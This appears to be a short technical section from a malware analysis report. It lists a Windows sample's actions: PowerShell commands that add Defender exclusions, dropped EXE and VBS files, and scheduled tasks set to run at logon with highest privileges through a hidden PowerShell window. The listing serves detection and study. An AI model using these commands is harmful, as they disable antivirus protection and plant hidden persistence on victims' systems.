Technical Information
- <SYSTEM32>\tasks\66
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "Add-MpPreference -ExclusionPath '%APPDATA%\66'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "Add-MpPreference -ExclusionProcess '%APPDATA%\66\<File name>.exe'"
- %APPDATA%\66\<File name>.exe
- nul
- %APPDATA%\66\<File name>.vbs
- DNS ASK localhost
- '<SYSTEM32>\schtasks.exe' /Delete /TN 66 /F
- '<SYSTEM32>\schtasks.exe' /Create /TN 66 /TR \"%APPDATA%\66\<File name>.exe\" /SC ONLOGON /RL HIGHEST /F
- '<SYSTEM32>\schtasks.exe' /Delete /TN "66 Monitor" /F
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -NonInteractive -WindowStyle Hidden -Command "$a = New-ScheduledTaskAction -Execute 'wscript.exe' -Argument '\"%APPDATA%\66\<File name>.vbs\"'; $t = New-ScheduledTaskTrigger -Once -A...